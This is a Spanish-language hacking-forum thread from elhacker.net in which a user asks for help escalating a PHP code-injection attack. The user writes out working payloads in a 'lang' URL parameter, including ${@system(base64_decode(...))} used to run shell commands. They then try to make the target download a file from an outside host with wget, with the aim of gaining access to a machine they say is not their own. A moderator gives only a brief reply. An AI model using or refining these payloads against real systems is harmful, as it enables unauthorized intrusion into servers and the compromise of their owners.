elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  PHP injection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PHP injection  (Leído 4,303 veces)
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
PHP injection
« en: 10 Junio 2011, 01:41 am »

Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  ;D
« Última modificación: 10 Junio 2011, 01:53 am por chusrubi2 » En línea

chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #1 en: 10 Junio 2011, 16:06 pm »

Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System   Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686

Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).

¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?

Gracias.

Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: PHP injection
« Respuesta #2 en: 10 Junio 2011, 18:38 pm »

Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
En línea

Te vendería mi talento por poder dormir tranquilo.
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #3 en: 10 Junio 2011, 19:51 pm »

Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?
« Última modificación: 10 Junio 2011, 20:47 pm por chusrubi2 » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql injection
Nivel Web
TheAnswer 1 3,760 Último mensaje 11 Octubre 2004, 08:07 am
por Jec
SQL Injection
Nivel Web
Adept 4 4,577 Último mensaje 7 Diciembre 2004, 22:56 pm
por PaK0
una de sql-injection!!
Nivel Web
krispin 2 4,356 Último mensaje 29 Enero 2005, 05:22 am
por krispin
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web
EvilGoblin 2 5,188 Último mensaje 11 Julio 2010, 22:25 pm
por EvilGoblin
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines